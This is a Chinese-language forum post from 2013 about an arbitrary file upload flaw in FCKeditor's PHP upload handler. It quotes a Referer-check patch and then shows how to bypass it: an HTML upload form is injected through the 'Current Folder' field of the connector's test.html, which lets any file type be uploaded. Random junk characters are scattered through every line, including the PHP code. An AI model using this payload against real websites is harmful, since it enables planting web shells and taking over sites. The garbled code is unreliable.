漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php- {, t) J0 X% B4 ]
网上给出的修复方案是
8 D R# X+ M9 w修复方法,删除FCK编辑器用其他的编辑器4 [! Y/ D6 Y& Q, Q+ k
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
. p; U9 z$ D. s1 F3 _! Y; H在; b9 B$ s* W0 Q; k2 o+ S' F
require(‘config.php’);+ B0 a; P& f7 }5 b) l/ r7 q
require(‘util.php’);
4 v8 a7 D, {+ q" W k5 d4 Z' M ?" i的下面添加以下代码—————————–
9 R+ g! r) j* _' c6 s' f//防止外部提交! Y, A$ o8 y8 |
function outsidepost()( [5 }# B& w. t6 G/ g# ~
{. l" m1 W3 a" y/ s+ @! n
$servername=$_SERVER['SERVER_NAME'];
* d( T; h0 e( |: y$sub_from=@$_SERVER['HTTP_REFERER'];
+ J6 k6 w. d, ?) t3 x! `$sub_len=strlen($servername);
) o9 a9 s6 L7 p$checkfrom=substr($sub_from,7,$sub_len);% c! a r) `; ?' _1 B8 R: ~1 f( j" \
if($checkfrom!=$servername){& C$ ] @* w- T2 o
echo(“you don’t outsidepost!”);9 ^9 V7 E3 q5 F: ~& Q9 @1 u% Q
exit;0 }# O0 Q+ k- z! Y# }1 H
}
8 z7 L; O# V# A0 Q" T}
2 z" a! i0 f0 C6 V1 Toutsidepost();6 s0 l# i# h4 H$ j
防止外部提交,但是没有防止内部提交,9 l7 {; j. O m2 E9 r3 W
利用方法:
9 g6 L' ^: p A+ p1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html" {8 L6 P f, j, C
2,在Current Folder 框输入
- u) \" x0 e; }# J<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
. W! ?# o7 O, m$ C& K. q然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。! e- n- `; z" O
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对